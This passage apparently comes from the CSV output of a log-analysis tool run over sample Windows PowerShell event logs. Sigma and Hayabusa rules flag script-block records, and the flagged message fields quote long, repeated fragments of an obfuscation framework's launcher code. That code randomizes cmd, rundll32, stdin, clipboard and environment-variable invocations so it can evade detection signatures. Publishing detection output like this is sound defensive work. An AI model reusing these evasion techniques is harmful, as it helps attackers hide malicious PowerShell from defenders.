$Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToRunDll , $RunDllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToRunDll + $RunDllCmdSyntax } 5 { ########## ## VAR+ ## ########## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable name to store the $ScriptString command. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Generate random case syntax for setting the above random variable name. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. 
$SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Build out command line syntax in reverse so we can di",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,Evas | Exec,Invoke-Obfuscation RUNDLL LAUNCHER,,rules/sigma/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"splay the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $InvokeVariableSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 6 { ############ ## STDIN+ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. 
$PSCmdSyntax = $PowerShellFlags + $PowerShellStdin $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 1 -Maximum 3) + '|' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 7 { ########### ## CLIP+ ## ########### # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. 
$PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 8 { ########### ## VAR++ ## ########### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. 
$SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Add additional escaping for vertical pipe (and other characters defined below) if necessary since this is going inside an environment variable for the final $CmdLineOutput set below. ForEach($Char in @('<','>','|','&')) { If($InvokeOption.Contains(""^$Char"")) { $InvokeOption = $InvokeOption.Replace(""^$Char"",""^^^$Char"") } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. 
$PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $SetSyntax2 + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 9 { ############# ## STDIN++ ## ############# # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. 
$SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariable = @() $ExecContextVariable += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'variable:' + (Get-Random -Input @('Ex*xt','E*",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"splay the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $InvokeVariableSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 6 { ############ ## STDIN+ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. 
$PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellStdin $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 1 -Maximum 3) + '|' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 7 { ########### ## CLIP+ ## ########### # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). 
$PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 8 { ########### ## VAR++ ## ########### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. 
$SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Add additional escaping for vertical pipe (and other characters defined below) if necessary since this is going inside an environment variable for the final $CmdLineOutput set below. ForEach($Char in @('<','>','|','&')) { If($InvokeOption.Contains(""^$Char"")) { $InvokeOption = $InvokeOption.Replace(""^$Char"",""^^^$Char"") } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. 
$PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $SetSyntax2 + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 9 { ############# ## STDIN++ ## ############# # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. 
$SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariable = @() $ExecContextVariable += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'variable:' + (Get-Random -Input @('Ex*xt','E*",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"t','*xec*t','*ecu*t','*cut*t','*cuti*t','*uti*t','E*ext','E*xt','E*Cont*','E*onte*','E*tex*','ExecutionContext')) + ').Value' # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariable # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $VariableName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$VariableName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random Invoke-Expression/IEX/$ExecutionContext syntax. 
$InvokeOptions = @() $InvokeOptions += (Get-Random -Input ('IEX','Invoke-Expression')) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $GetRandomVariableSyntax $InvokeOptions += (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $GetRandomVariableSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' # Select random option from above. $InvokeOption = Get-Random -Input $InvokeOptions # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $ExecContextVariable = ([Char[]]$ExecContextVariable.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $GetRandomVariableSyntax = ([Char[]]$GetRandomVariableSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Choose random syntax for invoking powershell.exe's StdIn. 
$PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} If($PowerShellStdin.Contains(""^$Char"")) {$PowerShellStdin = $PowerShellStdin.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellStdin + ' '*(Get-Random -Minimum 0 -Maximum 3) $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3)+ $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $SetSyntax2 + $Echo + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + '^|' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 10 { ############ ## CLIP++ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. 
